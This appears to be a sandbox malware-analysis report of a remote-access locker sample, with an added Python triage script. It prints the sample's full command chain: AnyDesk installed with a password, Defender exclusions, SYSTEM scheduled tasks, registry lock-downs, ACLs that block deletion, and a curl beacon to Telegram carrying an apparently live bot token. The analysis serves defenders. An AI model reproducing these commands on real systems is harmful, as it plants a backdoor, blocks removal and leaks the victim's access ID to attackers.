\??\c:\users\Admin\downloads\AnyDesk.exe
"c:\users\Admin\downloads\AnyDesk.exe" --local-service
\??\c:\users\Admin\downloads\AnyDesk.exe
"c:\users\Admin\downloads\AnyDesk.exe" --local-control
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://ctt.ac/Y6e79
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd9ea73cb8,0x7ffd9ea73cc8,0x7ffd9ea73cd8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1836,94688903236462326,6610335075450097265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6756 /prefetch:1
C:\ProgramData\AnyDesk.exe
"C:\ProgramData\AnyDesk.exe" --service
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1836,94688903236462326,6610335075450097265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2784 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1836,94688903236462326,6610335075450097265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1276 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1836,94688903236462326,6610335075450097265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6320 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1836,94688903236462326,6610335075450097265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7276 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1836,94688903236462326,6610335075450097265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7408 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1836,94688903236462326,6610335075450097265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7392 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1836,94688903236462326,6610335075450097265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7520 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1836,94688903236462326,6610335075450097265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4120 /prefetch:1
C:\ProgramData\AnyDesk.exe
"C:\ProgramData\AnyDesk.exe" --control
C:\ProgramData\AnyDesk.exe
"C:\ProgramData/Anydesk.exe" --remove-password
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo DinaOwnsMe "
C:\ProgramData\AnyDesk.exe
"C:\ProgramData/Anydesk.exe" --set-password
C:\Program Files\VideoLAN\VLC\vlc.exe
"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\AppData\Roaming\enc1.mp3"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c Copy-Item "c:/users/Admin/downloads/stn.exe" -Destination "C:\ProgramData" -r -force
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004E0 0x00000000000004EC
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://spankbang.com/tv/?station=hypno+joi
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd9ea73cb8,0x7ffd9ea73cc8,0x7ffd9ea73cd8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1836,94688903236462326,6610335075450097265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3292 /prefetch:1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c Copy-Item "c:/users/Admin/downloads/svchost.exe" -Destination "C:\ProgramData" -r -force
C:\Users\Admin\AppData\Roaming\locked.exe
"C:\Users\Admin\AppData\Roaming\locked.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1836,94688903236462326,6610335075450097265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6044 /prefetch:1
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\DD12.tmp\DD13.tmp\DD14.bat C:\Users\Admin\AppData\Roaming\locked.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1836,94688903236462326,6610335075450097265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5744 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1836,94688903236462326,6610335075450097265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7092 /prefetch:1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c Copy-Item "c:/users/Admin/downloads/conhost.exe" -Destination "C:\ProgramData" -r -force
C:\Windows\system32\reg.exe
REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1836,94688903236462326,6610335075450097265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7068 /prefetch:1
C:\Windows\system32\reg.exe
REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1836,94688903236462326,6610335075450097265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3524 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1836,94688903236462326,6610335075450097265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8680 /prefetch:1
C:\Windows\system32\reg.exe
REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideShutDown /v value /t REG_DWORD /d 1 /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c Copy-Item "c:/users/Admin/downloads/Anydesk.exe" -Destination "C:\ProgramData" -r -force
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideHibernate /v value /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideLock /v value /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HidePowerButton /v value /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideRestart /v value /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideSleep /v value /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideSwitchAccount /v value /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideSignOut /v value /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HidePowerOptions /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe
C:\Users\Admin\AppData\Roaming/AutoHotkeyU64.exe C:\Users\Admin\AppData\Roaming/doorbell2.ahk
C:\Windows\system32\timeout.exe
timeout /t 5 /nobreak
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c rm "c:/users/Admin/downloads/stn.exe" -r -force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c rm "c:/users/Admin/downloads/svchost.exe" -r -force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c rm "c:/users/Admin/downloads/Anydesk.exe" -r -force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c rm "c:/users/Admin/downloads/conhost.exe" -r -force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/stn.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/svchost.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/conhost.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/Anydesk.exe"
C:\Windows\system32\schtasks.exe
schtasks /Create /TN SystemTaskNavigator /TR "C:\ProgramData/stn.exe" /RL highest /SC ONLOGON /F
C:\Windows\system32\schtasks.exe
schtasks /Create /TN MicrosoftEdgeUpdateTaskList /TR "C:\ProgramData/Anydesk.exe" /RL highest /SC ONLOGON /RU SYSTEM /F
C:\Windows\system32\schtasks.exe
schtasks /Create /TN OneDriveTaskReport /TR "C:\ProgramData/svchost.exe" /RL highest /SC ONLOGON /RU SYSTEM /F
C:\Windows\system32\schtasks.exe
schtasks /Create /TN MicrosoftUpdateScheduler /TR "C:\ProgramData/conhost.exe" /RL highest /SC ONLOGON /RU SYSTEM /F
C:\Windows\system32\schtasks.exe
schtasks /run /tn "MicrosoftEdgeUpdateTaskList"
C:\ProgramData\Anydesk.exe
C:\ProgramData/Anydesk.exe
C:\Windows\system32\schtasks.exe
schtasks /run /tn "SystemTaskNavigator"
C:\ProgramData\stn.exe
C:\ProgramData/stn.exe
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/stn.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/stn.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/stn.exe" /inheritance:r /grant:r Everyone:RX /deny Everyone:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/Anydesk.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/anydesk.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/anydesk.exe" /inheritance:r /grant:r Everyone:RX /deny Everyone:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/svchost.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/svchost.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/svchost.exe" /inheritance:r /grant:r Everyone:RX /deny Everyone:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/conhost.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/conhost.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/conhost.exe" /inheritance:r /grant:r Everyone:RX /deny Everyone:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/stn.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/stn.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/stn.exe" /inheritance:r /grant:r Admin:RX /deny Admin:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/Anydesk.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/anydesk.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/anydesk.exe" /inheritance:r /grant:r Admin:RX /deny Admin:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/svchost.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/svchost.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/svchost.exe" /inheritance:r /grant:r Admin:RX /deny Admin:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/conhost.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/conhost.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/conhost.exe" /inheritance:r /grant:r Admin:RX /deny Admin:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/Anydesk.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/anydesk.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/anydesk.exe" /inheritance:r /grant:r SYSTEM:RX /deny SYSTEM:(DE,WO,WDAC))
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/svchost.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/svchost.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/svchost.exe" /inheritance:r /grant:r SYSTEM:RX /deny SYSTEM:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/conhost.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/conhost.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/conhost.exe" /inheritance:r /grant:r SYSTEM:RX /deny SYSTEM:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/stn.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/stn.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/stn.exe" /inheritance:r /grant:r SYSTEM:RX /deny SYSTEM:(DE,WO,WDAC)
C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe
C:\Users\Admin\AppData\Roaming/AutoHotkeyU64.exe C:\Users\Admin\AppData\Roaming/doorbell.ahk
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\246C.tmp\246D.tmp\246E.bat C:\ProgramData\stn.exe"
C:\Windows\system32\timeout.exe
timeout /T 30 /NOBREAK
C:\ProgramData\Anydesk.exe
"C:\ProgramData\Anydesk.exe" --control
C:\ProgramData\AnyDesk.exe
"C:\ProgramData/Anydesk.exe" --remove-password
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo DinaOwnsMe "
C:\ProgramData\AnyDesk.exe
"C:\ProgramData/Anydesk.exe" --set-password
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\ProgramData\Anydesk.exe" --get-id
C:\ProgramData\AnyDesk.exe
C:\ProgramData\Anydesk.exe --get-id
C:\Windows\system32\curl.exe
curl -k -f "https://api.telegram.org/bot7196577299:AAEob7nYSq_eAD8egojP3Pct71tZ1r_lZnI/sendMessage?chat_id=-1002158648396&text=Admin-1051708320"
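Read top to bottom, the command lines above are the whole playbook of the dropped batch script: copy the payloads into C:\ProgramData, exclude that directory and each binary from Defender, register ONLOGON scheduled tasks (three of them as SYSTEM), strip inheritance from the dropped files and deny Delete/Write-Owner/Write-DAC so the user cannot remove them, set an AnyDesk password, and post the AnyDesk ID to a Telegram chat. The triage helper below is an added example, not part of this report or of the sample's own code: it tokenizes a constructed subset of those command lines (the Telegram bot token and chat id are placeholders, not the live values), extracts the fields a responder needs (task name and run-as account, icacls principals and denied rights, Telegram bot id and chat id) and tags each line with the technique it implements, which is the shape both a detection rule and a cleanup checklist take.

```python
"""Triage helper for the process command lines listed in this report (added example,
not part of the report): tokenize each line, pull out what a responder needs, tag it."""
import re
from typing import Optional
from urllib.parse import parse_qs, urlsplit

# Constructed sample: a subset of the report's command lines. The Telegram
# bot token and chat id are placeholders, not the live values.
SAMPLE_CMDLINES = [
    r'powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData"',
    r'schtasks /Create /TN OneDriveTaskReport /TR "C:\ProgramData/svchost.exe" /RL highest /SC ONLOGON /RU SYSTEM /F',
    r'schtasks /Create /TN SystemTaskNavigator /TR "C:\ProgramData/stn.exe" /RL highest /SC ONLOGON /F',
    r'REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f',
    r'reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideShutDown /v value /t REG_DWORD /d 1 /f',
    r'icacls "C:\ProgramData/stn.exe" /inheritance:r /grant:r Everyone:RX /deny Everyone:(DE,WO,WDAC)',
    r'icacls "C:\ProgramData/anydesk.exe" /inheritance:r /grant:r SYSTEM:RX /deny SYSTEM:(DE,WO,WDAC))',
    r'"C:\ProgramData/Anydesk.exe" --set-password',
    r'curl -k -f "https://api.telegram.org/bot1234567890:PLACEHOLDER_TOKEN_0000/sendMessage?chat_id=-1001234567890&text=Admin-1051708320"',
    r'timeout /t 5 /nobreak',
]
_TOKEN_RE = re.compile(r'"([^"]*)"|(\S+)')
_TELEGRAM_RE = re.compile(r"https://api\.telegram\.org/bot(\d+):([A-Za-z0-9_-]+)/(\w+)")

def tokenize(cmdline: str) -> list:
    """Split a Windows command line on whitespace, honouring double quotes."""
    return [quoted or bare for quoted, bare in _TOKEN_RE.findall(cmdline)]

def parse_schtasks(cmdline: str) -> Optional[dict]:
    """schtasks switches as {FLAG: value or True}, e.g. {'RU': 'SYSTEM', 'F': True}."""
    toks = tokenize(cmdline)
    if not toks or toks[0].lower() != "schtasks":
        return None
    opts, i = {}, 1
    while i < len(toks):
        has_value = i + 1 < len(toks) and not toks[i + 1].startswith("/")
        opts[toks[i].lstrip("/").upper()] = toks[i + 1] if has_value else True
        i += 2 if has_value else 1
    return opts

def parse_icacls(cmdline: str) -> Optional[dict]:
    """Path, owner change, inheritance removal and grant/deny ACEs of an icacls call."""
    toks = tokenize(cmdline)
    if len(toks) < 2 or toks[0].lower() != "icacls":
        return None
    info = {"path": toks[1], "setowner": None, "inheritance_removed": False, "grant": {}, "deny": {}}
    for flag, arg in zip(toks[2:], toks[3:] + [""]):   # (switch, following token) pairs
        flag = flag.lower()
        if flag == "/inheritance:r":
            info["inheritance_removed"] = True
        elif flag == "/setowner":
            info["setowner"] = arg
        elif flag in ("/grant", "/grant:r", "/deny"):
            principal, _, rights = arg.rpartition(":")
            # strip("()") also swallows the stray ')' that one line in the report carries
            info["deny" if flag == "/deny" else "grant"][principal] = rights.strip("()").split(",")
    return info

def parse_telegram_beacon(cmdline: str) -> Optional[dict]:
    """Bot id, method and query fields of a Telegram Bot API call (token secret by length only)."""
    m = _TELEGRAM_RE.search(cmdline)
    if not m:
        return None
    bot_id, secret, method = m.groups()
    url = next(t for t in tokenize(cmdline) if "api.telegram.org" in t)
    q = parse_qs(urlsplit(url).query)
    return {"bot_id": bot_id, "token_secret_len": len(secret), "method": method,
            "chat_id": q.get("chat_id", [None])[0], "text": q.get("text", [None])[0]}

def classify(cmdline: str) -> list:
    """Tag one command line with the techniques this report's script uses."""
    toks = tokenize(cmdline) or [""]
    exe = toks[0].lower().rsplit("\\", 1)[-1].rsplit("/", 1)[-1]   # bare image name
    low, tags = cmdline.lower(), []
    if exe.startswith("powershell") and "add-mppreference" in low and "-exclusion" in low:
        tags.append("defender_exclusion")
    task = parse_schtasks(cmdline)
    if task and task.get("CREATE"):
        tags.append("scheduled_task_persistence")
        if str(task.get("RU", "")).upper() == "SYSTEM":
            tags.append("task_runs_as_system")
    if exe in ("reg", "reg.exe") and len(toks) > 1 and toks[1].lower() == "add":
        if "disabletaskmgr" in low:
            tags.append("task_manager_disabled")
        elif "\\policies\\" in low or "\\policymanager\\" in low:
            tags.append("ui_lockdown_policy")
    acl = parse_icacls(cmdline)
    if acl and any("DE" in ace for ace in acl["deny"].values()):   # DE = delete denied
        tags.append("dropped_file_delete_denied")
    if exe == "anydesk.exe" and "--set-password" in low:
        tags.append("remote_access_password_set")
    if parse_telegram_beacon(cmdline):
        tags.append("telegram_beacon")
    if exe in ("timeout", "timeout.exe"):
        tags.append("execution_delay")
    return tags

if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        print(classify(line), line[:60])
```

The parsers deliberately return structured fields rather than a boolean: the task name and run-as account are what `schtasks /Delete` needs, the icacls principal and denied-rights list tell a responder what `/remove:d` and `/setowner` have to undo before the file can be deleted, and the Telegram record keeps the bot id and chat id while dropping the secret half of the token so the IOC can be shared.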
Network
| Country | Destination | Domain | Proto |
| US | 151.101.1.229:443 | cdn.jsdelivr.net | tcp |
| RU | 88.212.201.198:443 | counter.yadro.ru | tcp |
| NL | 142.250.27.92:443 | pay.google.com | tcp |
| US | 8.8.8.8:53 | 229.1.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.147.200.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.20.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.201.212.88.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | | udp |
| NL | 142.250.27.92:443 | pay.google.com | udp |
| GB | 142.250.178.14:443 | google.com | tcp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| US | 74.125.250.129:19302 | stun.l.google.com | udp |
| NL | 142.250.27.92:443 | pay.google.com | udp |
| NL | 142.250.27.81:443 | pay.sandbox.google.com | tcp |
| FR | 142.250.179.98:443 | googleads.g.doubleclick.net | tcp |
| US | 104.21.4.208:443 | cdn.iplogger.org | tcp |
| IE | 2.18.24.11:80 | apps.identrust.com | tcp |
| FR | 51.178.66.33:443 | gofile.io | tcp |
| FR | 51.178.66.33:443 | gofile.io | tcp |
| FR | 151.80.29.83:443 | gofile.io | tcp |
| FR | 51.75.242.210:443 | s.gofile.io | tcp |
| FR | 51.75.242.210:443 | s.gofile.io | tcp |
| DE | 78.46.174.169:443 | ad.a-ads.com | tcp |
| FR | 31.14.70.252:443 | store10.gofile.io | tcp |
| FR | 31.14.70.252:443 | store10.gofile.io | tcp |
| NL | 185.229.191.44:443 | boot.net.anydesk.com | tcp |
| GB | 195.181.165.153:443 | relay-79bdf984.net.anydesk.com | tcp |
| US | 134.209.68.5:443 | clicktotweet.com | tcp |
| US | 134.209.68.5:443 | clicktotweet.com | tcp |
| US | 134.209.68.5:443 | clicktotweet.com | tcp |
| BE | 64.233.166.155:443 | stats.g.doubleclick.net | tcp |
| US | 104.244.42.1:443 | twitter.com | tcp |
| US | 104.244.42.1:443 | twitter.com | tcp |
| US | 152.199.21.141:443 | abs.twimg.com | tcp |
| US | 104.244.42.66:443 | api.twitter.com | tcp |
| US | 104.244.42.66:443 | api.twitter.com | tcp |
| PL | 93.184.221.165:443 | t.co | tcp |
| US | 151.101.188.159:443 | pbs.twimg.com | tcp |
| US | 8.8.8.8:53 | 1.42.244.104.in-addr.arpa | udp |
| US | 152.199.21.141:443 | abs.twimg.com | tcp |
| NL | 185.229.191.44:443 | boot.net.anydesk.com | tcp |
| US | 151.101.188.158:443 | video.twimg.com | tcp |
| US | 104.244.43.131:443 | abs-0.twimg.com | tcp |
| GB | 57.128.141.154:443 | relay-aeafd8c0.net.anydesk.com | tcp |
| US | 8.8.8.8:53 | 165.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 158.188.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.43.244.104.in-addr.arpa | udp |
| N/A | 239.255.102.18:50001 | | udp |
| N/A | 239.255.102.18:50002 | | udp |
| N/A | 239.255.102.18:50003 | | udp |
| N/A | 239.255.102.18:50001 | | udp |
| N/A | 239.255.102.18:50002 | | udp |
| N/A | 239.255.102.18:50003 | | udp |
| NL | 142.250.102.84:443 | accounts.google.com | tcp |
